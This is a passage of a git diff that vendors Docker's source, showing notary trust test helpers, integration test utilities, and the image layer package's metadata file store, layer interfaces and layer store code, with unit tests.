*DockerTrustSuite) notaryImportKey(c *check.C, repoName, role string, privKey string) { + impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key", + "import", privKey, "-g", repoName, "-r", role) + notaryClientEnv(impCmd) + out, _, err := runCommandWithOutput(impCmd) + if err != nil { + c.Fatalf("Error importing key to notary repository: %s\n", out) + } +} + +func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string { + listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list", + repoName, "-r", role) + notaryClientEnv(listCmd) + out, _, err := runCommandWithOutput(listCmd) + if err != nil { + c.Fatalf("Error listing targets in notary repository: %s\n", out) + } + + // should look something like: + // NAME DIGEST SIZE (BYTES) ROLE + // ------------------------------------------------------------------------------------------------------ + // latest 24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56 1377 targets + + targets := make(map[string]string) + + // no target + lines := strings.Split(strings.TrimSpace(out), "\n") + if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") { + return targets + } + + // otherwise, there is at least one target + c.Assert(len(lines), checker.GreaterOrEqualThan, 3) + + for _, line := range lines[2:] { + tokens := strings.Fields(line) + c.Assert(tokens, checker.HasLen, 4) + targets[tokens[0]] = tokens[3] + } + + return targets +} + +func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) { + // check all the roles + for _, role := range roles { + targets := s.notaryListTargetsInRole(c, repoName, role) + roleName, ok := targets[target] + c.Assert(ok, checker.True) + c.Assert(roleName, checker.Equals, role) + } +} + +func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) { 
+ targets := s.notaryListTargetsInRole(c, repoName, "targets") + + roleName, ok := targets[target] + if ok { + for _, role := range roles { + c.Assert(roleName, checker.Not(checker.Equals), role) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go new file mode 100644 index 0000000000..87d48e41b0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/utils.go @@ -0,0 +1,79 @@ +package main + +import ( + "io" + "os" + "os/exec" + "time" + + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/cmd" +) + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if daemonPlatform == "windows" { + return "c:", `\` + } + return "", "/" +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.Combined(), result.ExitCode, result.Error +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.Stdout(), result.Stderr(), result.ExitCode, result.Error +} + +// TODO: update code to call cmd.RunCmd directly, and remove this function +func runCommand(execCmd *exec.Cmd) (exitCode int, err error) { + result := cmd.RunCmd(transformCmd(execCmd)) + return result.ExitCode, result.Error +} + +// Temporary shim for migrating commands to the new function +func transformCmd(execCmd *exec.Cmd) cmd.Cmd { + return cmd.Cmd{ + Command: execCmd.Args, + Env: execCmd.Env, + Dir: execCmd.Dir, + Stdin: execCmd.Stdin, + Stdout: execCmd.Stdout, + } +} + +func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { + return integration.RunCommandPipelineWithOutput(cmds...) 
+} + +func convertSliceOfStringsToMap(input []string) map[string]struct{} { + return integration.ConvertSliceOfStringsToMap(input) +} + +func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { + return integration.CompareDirectoryEntries(e1, e2) +} + +func listTar(f io.Reader) ([]string, error) { + return integration.ListTar(f) +} + +func randomTmpDirPath(s string, platform string) string { + return integration.RandomTmpDirPath(s, platform) +} + +func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { + return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop) +} + +func parseCgroupPaths(procCgroupData string) map[string]string { + return integration.ParseCgroupPaths(procCgroupData) +} + +func runAtDifferentDate(date time.Time, block func()) { + integration.RunAtDifferentDate(date, block) +} diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go new file mode 100644 index 0000000000..3b6ffc82f7 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/empty.go @@ -0,0 +1,56 @@ +package layer + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" +) + +// DigestSHA256EmptyTar is the canonical sha256 digest of empty tar file - +// (1024 NULL bytes) +const DigestSHA256EmptyTar = DiffID("sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef") + +type emptyLayer struct{} + +// EmptyLayer is a layer that corresponds to empty tar. 
+var EmptyLayer = &emptyLayer{} + +func (el *emptyLayer) TarStream() (io.ReadCloser, error) { + buf := new(bytes.Buffer) + tarWriter := tar.NewWriter(buf) + tarWriter.Close() + return ioutil.NopCloser(buf), nil +} + +func (el *emptyLayer) TarStreamFrom(p ChainID) (io.ReadCloser, error) { + if p == "" { + return el.TarStream() + } + return nil, fmt.Errorf("can't get parent tar stream of an empty layer") +} + +func (el *emptyLayer) ChainID() ChainID { + return ChainID(DigestSHA256EmptyTar) +} + +func (el *emptyLayer) DiffID() DiffID { + return DigestSHA256EmptyTar +} + +func (el *emptyLayer) Parent() Layer { + return nil +} + +func (el *emptyLayer) Size() (size int64, err error) { + return 0, nil +} + +func (el *emptyLayer) DiffSize() (size int64, err error) { + return 0, nil +} + +func (el *emptyLayer) Metadata() (map[string]string, error) { + return make(map[string]string), nil +} diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go new file mode 100644 index 0000000000..c22da7665d --- /dev/null +++ b/vendor/github.com/docker/docker/layer/empty_test.go @@ -0,0 +1,46 @@ +package layer + +import ( + "io" + "testing" + + "github.com/docker/distribution/digest" +) + +func TestEmptyLayer(t *testing.T) { + if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) { + t.Fatal("wrong ID for empty layer") + } + + if EmptyLayer.DiffID() != DigestSHA256EmptyTar { + t.Fatal("wrong DiffID for empty layer") + } + + if EmptyLayer.Parent() != nil { + t.Fatal("expected no parent for empty layer") + } + + if size, err := EmptyLayer.Size(); err != nil || size != 0 { + t.Fatal("expected zero size for empty layer") + } + + if diffSize, err := EmptyLayer.DiffSize(); err != nil || diffSize != 0 { + t.Fatal("expected zero diffsize for empty layer") + } + + tarStream, err := EmptyLayer.TarStream() + if err != nil { + t.Fatalf("error streaming tar for empty layer: %v", err) + } + + digester := digest.Canonical.New() + _, err = 
io.Copy(digester.Hash(), tarStream) + + if err != nil { + t.Fatalf("error hashing empty tar layer: %v", err) + } + + if digester.Digest() != digest.Digest(DigestSHA256EmptyTar) { + t.Fatal("empty layer tar stream hashes to wrong value") + } +} diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go new file mode 100644 index 0000000000..42b45556e3 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore.go @@ -0,0 +1,354 @@ +package layer + +import ( + "compress/gzip" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "regexp" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + stringIDRegexp = regexp.MustCompile(`^[a-f0-9]{64}(-init)?$`) + supportedAlgorithms = []digest.Algorithm{ + digest.SHA256, + // digest.SHA384, // Currently not used + // digest.SHA512, // Currently not used + } +) + +type fileMetadataStore struct { + root string +} + +type fileMetadataTransaction struct { + store *fileMetadataStore + ws *ioutils.AtomicWriteSet +} + +// NewFSMetadataStore returns an instance of a metadata store +// which is backed by files on disk using the provided root +// as the root of metadata files. 
+func NewFSMetadataStore(root string) (MetadataStore, error) { + if err := os.MkdirAll(root, 0700); err != nil { + return nil, err + } + return &fileMetadataStore{ + root: root, + }, nil +} + +func (fms *fileMetadataStore) getLayerDirectory(layer ChainID) string { + dgst := digest.Digest(layer) + return filepath.Join(fms.root, string(dgst.Algorithm()), dgst.Hex()) +} + +func (fms *fileMetadataStore) getLayerFilename(layer ChainID, filename string) string { + return filepath.Join(fms.getLayerDirectory(layer), filename) +} + +func (fms *fileMetadataStore) getMountDirectory(mount string) string { + return filepath.Join(fms.root, "mounts", mount) +} + +func (fms *fileMetadataStore) getMountFilename(mount, filename string) string { + return filepath.Join(fms.getMountDirectory(mount), filename) +} + +func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) { + tmpDir := filepath.Join(fms.root, "tmp") + if err := os.MkdirAll(tmpDir, 0755); err != nil { + return nil, err + } + ws, err := ioutils.NewAtomicWriteSet(tmpDir) + if err != nil { + return nil, err + } + + return &fileMetadataTransaction{ + store: fms, + ws: ws, + }, nil +} + +func (fm *fileMetadataTransaction) SetSize(size int64) error { + content := fmt.Sprintf("%d", size) + return fm.ws.WriteFile("size", []byte(content), 0644) +} + +func (fm *fileMetadataTransaction) SetParent(parent ChainID) error { + return fm.ws.WriteFile("parent", []byte(digest.Digest(parent).String()), 0644) +} + +func (fm *fileMetadataTransaction) SetDiffID(diff DiffID) error { + return fm.ws.WriteFile("diff", []byte(digest.Digest(diff).String()), 0644) +} + +func (fm *fileMetadataTransaction) SetCacheID(cacheID string) error { + return fm.ws.WriteFile("cache-id", []byte(cacheID), 0644) +} + +func (fm *fileMetadataTransaction) SetDescriptor(ref distribution.Descriptor) error { + jsonRef, err := json.Marshal(ref) + if err != nil { + return err + } + return fm.ws.WriteFile("descriptor.json", jsonRef, 0644) +} + +func (fm 
*fileMetadataTransaction) TarSplitWriter(compressInput bool) (io.WriteCloser, error) { + f, err := fm.ws.FileWriter("tar-split.json.gz", os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return nil, err + } + var wc io.WriteCloser + if compressInput { + wc = gzip.NewWriter(f) + } else { + wc = f + } + + return ioutils.NewWriteCloserWrapper(wc, func() error { + wc.Close() + return f.Close() + }), nil +} + +func (fm *fileMetadataTransaction) Commit(layer ChainID) error { + finalDir := fm.store.getLayerDirectory(layer) + if err := os.MkdirAll(filepath.Dir(finalDir), 0755); err != nil { + return err + } + + return fm.ws.Commit(finalDir) +} + +func (fm *fileMetadataTransaction) Cancel() error { + return fm.ws.Cancel() +} + +func (fm *fileMetadataTransaction) String() string { + return fm.ws.String() +} + +func (fms *fileMetadataStore) GetSize(layer ChainID) (int64, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "size")) + if err != nil { + return 0, err + } + + size, err := strconv.ParseInt(string(content), 10, 64) + if err != nil { + return 0, err + } + + return size, nil +} + +func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "parent")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return ChainID(dgst), nil +} + +func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "diff")) + if err != nil { + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return DiffID(dgst), nil +} + +func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "cache-id")) + if err 
!= nil { + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid cache id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetDescriptor(layer ChainID) (distribution.Descriptor, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "descriptor.json")) + if err != nil { + if os.IsNotExist(err) { + // only return empty descriptor to represent what is stored + return distribution.Descriptor{}, nil + } + return distribution.Descriptor{}, err + } + + var ref distribution.Descriptor + err = json.Unmarshal(content, &ref) + if err != nil { + return distribution.Descriptor{}, err + } + return ref, err +} + +func (fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, error) { + fz, err := os.Open(fms.getLayerFilename(layer, "tar-split.json.gz")) + if err != nil { + return nil, err + } + f, err := gzip.NewReader(fz) + if err != nil { + return nil, err + } + + return ioutils.NewReadCloserWrapper(f, func() error { + f.Close() + return fz.Close() + }), nil +} + +func (fms *fileMetadataStore) SetMountID(mount string, mountID string) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "mount-id"), []byte(mountID), 0644) +} + +func (fms *fileMetadataStore) SetInitID(mount string, init string) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "init-id"), []byte(init), 0644) +} + +func (fms *fileMetadataStore) SetMountParent(mount string, parent ChainID) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "parent"), []byte(digest.Digest(parent).String()), 0644) +} + +func (fms *fileMetadataStore) GetMountID(mount string) (string, 
error) { + contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "mount-id")) + if err != nil { + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid mount id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetInitID(mount string) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "init-id")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid init id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) { + content, err := ioutil.ReadFile(fms.getMountFilename(mount, "parent")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return ChainID(dgst), nil +} + +func (fms *fileMetadataStore) List() ([]ChainID, []string, error) { + var ids []ChainID + for _, algorithm := range supportedAlgorithms { + fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, string(algorithm))) + if err != nil { + if os.IsNotExist(err) { + continue + } + return nil, nil, err + } + + for _, fi := range fileInfos { + if fi.IsDir() && fi.Name() != "mounts" { + dgst := digest.NewDigestFromHex(string(algorithm), fi.Name()) + if err := dgst.Validate(); err != nil { + logrus.Debugf("Ignoring invalid digest %s:%s", algorithm, fi.Name()) + } else { + ids = append(ids, ChainID(dgst)) + } + } + } + } + + fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, "mounts")) + if err != nil { + if os.IsNotExist(err) { + return ids, []string{}, nil + } + return nil, nil, err + } + + var mounts []string + for _, fi := range fileInfos { + if fi.IsDir() { + mounts = 
append(mounts, fi.Name()) + } + } + + return ids, mounts, nil +} + +func (fms *fileMetadataStore) Remove(layer ChainID) error { + return os.RemoveAll(fms.getLayerDirectory(layer)) +} + +func (fms *fileMetadataStore) RemoveMount(mount string) error { + return os.RemoveAll(fms.getMountDirectory(mount)) +} diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go new file mode 100644 index 0000000000..55e3b28530 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_test.go @@ -0,0 +1,104 @@ +package layer + +import ( + "fmt" + "io/ioutil" + "math/rand" + "os" + "path/filepath" + "strings" + "syscall" + "testing" + + "github.com/docker/distribution/digest" +) + +func randomLayerID(seed int64) ChainID { + r := rand.New(rand.NewSource(seed)) + + return ChainID(digest.FromBytes([]byte(fmt.Sprintf("%d", r.Int63())))) +} + +func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) { + td, err := ioutil.TempDir("", "layers-") + if err != nil { + t.Fatal(err) + } + fms, err := NewFSMetadataStore(td) + if err != nil { + t.Fatal(err) + } + + return fms.(*fileMetadataStore), td, func() { + if err := os.RemoveAll(td); err != nil { + t.Logf("Failed to cleanup %q: %s", td, err) + } + } +} + +func assertNotDirectoryError(t *testing.T, err error) { + perr, ok := err.(*os.PathError) + if !ok { + t.Fatalf("Unexpected error %#v, expected path error", err) + } + + if perr.Err != syscall.ENOTDIR { + t.Fatalf("Unexpected error %s, expected %s", perr.Err, syscall.ENOTDIR) + } +} + +func TestCommitFailure(t *testing.T) { + fms, td, cleanup := newFileMetadataStore(t) + defer cleanup() + + if err := ioutil.WriteFile(filepath.Join(td, "sha256"), []byte("was here first!"), 0644); err != nil { + t.Fatal(err) + } + + tx, err := fms.StartTransaction() + if err != nil { + t.Fatal(err) + } + + if err := tx.SetSize(0); err != nil { + t.Fatal(err) + } + + err = tx.Commit(randomLayerID(5)) + if err == 
nil { + t.Fatalf("Expected error committing with invalid layer parent directory") + } + assertNotDirectoryError(t, err) +} + +func TestStartTransactionFailure(t *testing.T) { + fms, td, cleanup := newFileMetadataStore(t) + defer cleanup() + + if err := ioutil.WriteFile(filepath.Join(td, "tmp"), []byte("was here first!"), 0644); err != nil { + t.Fatal(err) + } + + _, err := fms.StartTransaction() + if err == nil { + t.Fatalf("Expected error starting transaction with invalid layer parent directory") + } + assertNotDirectoryError(t, err) + + if err := os.Remove(filepath.Join(td, "tmp")); err != nil { + t.Fatal(err) + } + + tx, err := fms.StartTransaction() + if err != nil { + t.Fatal(err) + } + + if expected := filepath.Join(td, "tmp"); strings.HasPrefix(expected, tx.String()) { + t.Fatalf("Unexpected transaction string %q, expected prefix %q", tx.String(), expected) + } + + if err := tx.Cancel(); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go new file mode 100644 index 0000000000..ec1d4346d7 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer.go @@ -0,0 +1,275 @@ +// Package layer is package for managing read-only +// and read-write mounts on the union file system +// driver. Read-only mounts are referenced using a +// content hash and are protected from mutation in +// the exposed interface. The tar format is used +// to create read-only layers and export both +// read-only and writable layers. The exported +// tar data for a read-only layer should match +// the tar used to create the layer. +package layer + +import ( + "errors" + "io" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/archive" +) + +var ( + // ErrLayerDoesNotExist is used when an operation is + // attempted on a layer which does not exist. 
+ ErrLayerDoesNotExist = errors.New("layer does not exist") + + // ErrLayerNotRetained is used when a release is + // attempted on a layer which is not retained. + ErrLayerNotRetained = errors.New("layer not retained") + + // ErrMountDoesNotExist is used when an operation is + // attempted on a mount layer which does not exist. + ErrMountDoesNotExist = errors.New("mount does not exist") + + // ErrMountNameConflict is used when a mount is attempted + // to be created but there is already a mount with the name + // used for creation. + ErrMountNameConflict = errors.New("mount already exists with name") + + // ErrActiveMount is used when an operation on a + // mount is attempted but the layer is still + // mounted and the operation cannot be performed. + ErrActiveMount = errors.New("mount still active") + + // ErrNotMounted is used when requesting an active + // mount but the layer is not mounted. + ErrNotMounted = errors.New("not mounted") + + // ErrMaxDepthExceeded is used when a layer is attempted + // to be created which would result in a layer depth + // greater than the 125 max. + ErrMaxDepthExceeded = errors.New("max depth exceeded") + + // ErrNotSupported is used when the action is not supported + // on the current platform + ErrNotSupported = errors.New("not support on this platform") +) + +// ChainID is the content-addressable ID of a layer. +type ChainID digest.Digest + +// String returns a string rendition of a layer ID +func (id ChainID) String() string { + return string(id) +} + +// DiffID is the hash of an individual layer tar. +type DiffID digest.Digest + +// String returns a string rendition of a layer DiffID +func (diffID DiffID) String() string { + return string(diffID) +} + +// TarStreamer represents an object which may +// have its contents exported as a tar stream. +type TarStreamer interface { + // TarStream returns a tar archive stream + // for the contents of a layer. 
+ TarStream() (io.ReadCloser, error) +} + +// Layer represents a read-only layer +type Layer interface { + TarStreamer + + // TarStreamFrom returns a tar archive stream for all the layer chain with + // arbitrary depth. + TarStreamFrom(ChainID) (io.ReadCloser, error) + + // ChainID returns the content hash of the entire layer chain. The hash + // chain is made up of DiffID of top layer and all of its parents. + ChainID() ChainID + + // DiffID returns the content hash of the layer + // tar stream used to create this layer. + DiffID() DiffID + + // Parent returns the next layer in the layer chain. + Parent() Layer + + // Size returns the size of the entire layer chain. The size + // is calculated from the total size of all files in the layers. + Size() (int64, error) + + // DiffSize returns the size difference of the top layer + // from parent layer. + DiffSize() (int64, error) + + // Metadata returns the low level storage metadata associated + // with layer. + Metadata() (map[string]string, error) +} + +// RWLayer represents a layer which is +// read and writable +type RWLayer interface { + TarStreamer + + // Name of mounted layer + Name() string + + // Parent returns the layer which the writable + // layer was created from. + Parent() Layer + + // Mount mounts the RWLayer and returns the filesystem path + // the to the writable layer. + Mount(mountLabel string) (string, error) + + // Unmount unmounts the RWLayer. This should be called + // for every mount. If there are multiple mount calls + // this operation will only decrement the internal mount counter. + Unmount() error + + // Size represents the size of the writable layer + // as calculated by the total size of the files + // changed in the mutable layer. + Size() (int64, error) + + // Changes returns the set of changes for the mutable layer + // from the base layer. 
+ Changes() ([]archive.Change, error) + + // Metadata returns the low level metadata for the mutable layer + Metadata() (map[string]string, error) +} + +// Metadata holds information about a +// read-only layer +type Metadata struct { + // ChainID is the content hash of the layer + ChainID ChainID + + // DiffID is the hash of the tar data used to + // create the layer + DiffID DiffID + + // Size is the size of the layer and all parents + Size int64 + + // DiffSize is the size of the top layer + DiffSize int64 +} + +// MountInit is a function to initialize a +// writable mount. Changes made here will +// not be included in the Tar stream of the +// RWLayer. +type MountInit func(root string) error + +// Store represents a backend for managing both +// read-only and read-write layers. +type Store interface { + Register(io.Reader, ChainID) (Layer, error) + Get(ChainID) (Layer, error) + Map() map[ChainID]Layer + Release(Layer) ([]Metadata, error) + + CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) + GetRWLayer(id string) (RWLayer, error) + GetMountID(id string) (string, error) + ReleaseRWLayer(RWLayer) ([]Metadata, error) + + Cleanup() error + DriverStatus() [][2]string + DriverName() string +} + +// DescribableStore represents a layer store capable of storing +// descriptors for layers. +type DescribableStore interface { + RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error) +} + +// MetadataTransaction represents functions for setting layer metadata +// with a single transaction. 
+type MetadataTransaction interface { + SetSize(int64) error + SetParent(parent ChainID) error + SetDiffID(DiffID) error + SetCacheID(string) error + SetDescriptor(distribution.Descriptor) error + TarSplitWriter(compressInput bool) (io.WriteCloser, error) + + Commit(ChainID) error + Cancel() error + String() string +} + +// MetadataStore represents a backend for persisting +// metadata about layers and providing the metadata +// for restoring a Store. +type MetadataStore interface { + // StartTransaction starts an update for new metadata + // which will be used to represent an ID on commit. + StartTransaction() (MetadataTransaction, error) + + GetSize(ChainID) (int64, error) + GetParent(ChainID) (ChainID, error) + GetDiffID(ChainID) (DiffID, error) + GetCacheID(ChainID) (string, error) + GetDescriptor(ChainID) (distribution.Descriptor, error) + TarSplitReader(ChainID) (io.ReadCloser, error) + + SetMountID(string, string) error + SetInitID(string, string) error + SetMountParent(string, ChainID) error + + GetMountID(string) (string, error) + GetInitID(string) (string, error) + GetMountParent(string) (ChainID, error) + + // List returns the full list of referenced + // read-only and read-write layers + List() ([]ChainID, []string, error) + + Remove(ChainID) error + RemoveMount(string) error +} + +// CreateChainID returns ID for a layerDigest slice +func CreateChainID(dgsts []DiffID) ChainID { + return createChainIDFromParent("", dgsts...) +} + +func createChainIDFromParent(parent ChainID, dgsts ...DiffID) ChainID { + if len(dgsts) == 0 { + return parent + } + if parent == "" { + return createChainIDFromParent(ChainID(dgsts[0]), dgsts[1:]...) + } + // H = "H(n-1) SHA256(n)" + dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0]))) + return createChainIDFromParent(ChainID(dgst), dgsts[1:]...) 
+} + +// ReleaseAndLog releases the provided layer from the given layer +// store, logging any error and release metadata +func ReleaseAndLog(ls Store, l Layer) { + metadata, err := ls.Release(l) + if err != nil { + logrus.Errorf("Error releasing layer %s: %v", l.ChainID(), err) + } + LogReleaseMetadata(metadata) +} + +// LogReleaseMetadata logs a metadata array, uses this to +// ensure consistent logging for release metadata +func LogReleaseMetadata(metadatas []Metadata) { + for _, metadata := range metadatas { + logrus.Infof("Layer %s cleaned up", metadata.ChainID) + } +} diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go new file mode 100644 index 0000000000..1a1ff9fe59 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_store.go @@ -0,0 +1,684 @@ +package layer + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/stringid" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +// maxLayerDepth represents the maximum number of +// layers which can be chained together. 125 was +// chosen to account for the 127 max in some +// graphdrivers plus the 2 additional layers +// used to create a rwlayer. 
+const maxLayerDepth = 125 + +type layerStore struct { + store MetadataStore + driver graphdriver.Driver + + layerMap map[ChainID]*roLayer + layerL sync.Mutex + + mounts map[string]*mountedLayer + mountL sync.Mutex +} + +// StoreOptions are the options used to create a new Store instance +type StoreOptions struct { + StorePath string + MetadataStorePathTemplate string + GraphDriver string + GraphDriverOptions []string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + PluginGetter plugingetter.PluginGetter + ExperimentalEnabled bool +} + +// NewStoreFromOptions creates a new Store instance +func NewStoreFromOptions(options StoreOptions) (Store, error) { + driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{ + Root: options.StorePath, + DriverOptions: options.GraphDriverOptions, + UIDMaps: options.UIDMaps, + GIDMaps: options.GIDMaps, + ExperimentalEnabled: options.ExperimentalEnabled, + }) + if err != nil { + return nil, fmt.Errorf("error initializing graphdriver: %v", err) + } + logrus.Debugf("Using graph driver %s", driver) + + fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver)) + if err != nil { + return nil, err + } + + return NewStoreFromGraphDriver(fms, driver) +} + +// NewStoreFromGraphDriver creates a new Store instance using the provided +// metadata store and graph driver. The metadata store will be used to restore +// the Store. 
+func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) { + ls := &layerStore{ + store: store, + driver: driver, + layerMap: map[ChainID]*roLayer{}, + mounts: map[string]*mountedLayer{}, + } + + ids, mounts, err := store.List() + if err != nil { + return nil, err + } + + for _, id := range ids { + l, err := ls.loadLayer(id) + if err != nil { + logrus.Debugf("Failed to load layer %s: %s", id, err) + continue + } + if l.parent != nil { + l.parent.referenceCount++ + } + } + + for _, mount := range mounts { + if err := ls.loadMount(mount); err != nil { + logrus.Debugf("Failed to load mount %s: %s", mount, err) + } + } + + return ls, nil +} + +func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { + cl, ok := ls.layerMap[layer] + if ok { + return cl, nil + } + + diff, err := ls.store.GetDiffID(layer) + if err != nil { + return nil, fmt.Errorf("failed to get diff id for %s: %s", layer, err) + } + + size, err := ls.store.GetSize(layer) + if err != nil { + return nil, fmt.Errorf("failed to get size for %s: %s", layer, err) + } + + cacheID, err := ls.store.GetCacheID(layer) + if err != nil { + return nil, fmt.Errorf("failed to get cache id for %s: %s", layer, err) + } + + parent, err := ls.store.GetParent(layer) + if err != nil { + return nil, fmt.Errorf("failed to get parent for %s: %s", layer, err) + } + + descriptor, err := ls.store.GetDescriptor(layer) + if err != nil { + return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err) + } + + cl = &roLayer{ + chainID: layer, + diffID: diff, + size: size, + cacheID: cacheID, + layerStore: ls, + references: map[Layer]struct{}{}, + descriptor: descriptor, + } + + if parent != "" { + p, err := ls.loadLayer(parent) + if err != nil { + return nil, err + } + cl.parent = p + } + + ls.layerMap[cl.chainID] = cl + + return cl, nil +} + +func (ls *layerStore) loadMount(mount string) error { + if _, ok := ls.mounts[mount]; ok { + return nil + } + + mountID, err := 
ls.store.GetMountID(mount) + if err != nil { + return err + } + + initID, err := ls.store.GetInitID(mount) + if err != nil { + return err + } + + parent, err := ls.store.GetMountParent(mount) + if err != nil { + return err + } + + ml := &mountedLayer{ + name: mount, + mountID: mountID, + initID: initID, + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + if parent != "" { + p, err := ls.loadLayer(parent) + if err != nil { + return err + } + ml.parent = p + + p.referenceCount++ + } + + ls.mounts[ml.name] = ml + + return nil +} + +func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { + digester := digest.Canonical.New() + tr := io.TeeReader(ts, digester.Hash()) + + tsw, err := tx.TarSplitWriter(true) + if err != nil { + return err + } + metaPacker := storage.NewJSONPacker(tsw) + defer tsw.Close() + + // we're passing nil here for the file putter, because the ApplyDiff will + // handle the extraction of the archive + rdr, err := asm.NewInputTarStream(tr, metaPacker, nil) + if err != nil { + return err + } + + applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr) + if err != nil { + return err + } + + // Discard trailing data but ensure metadata is picked up to 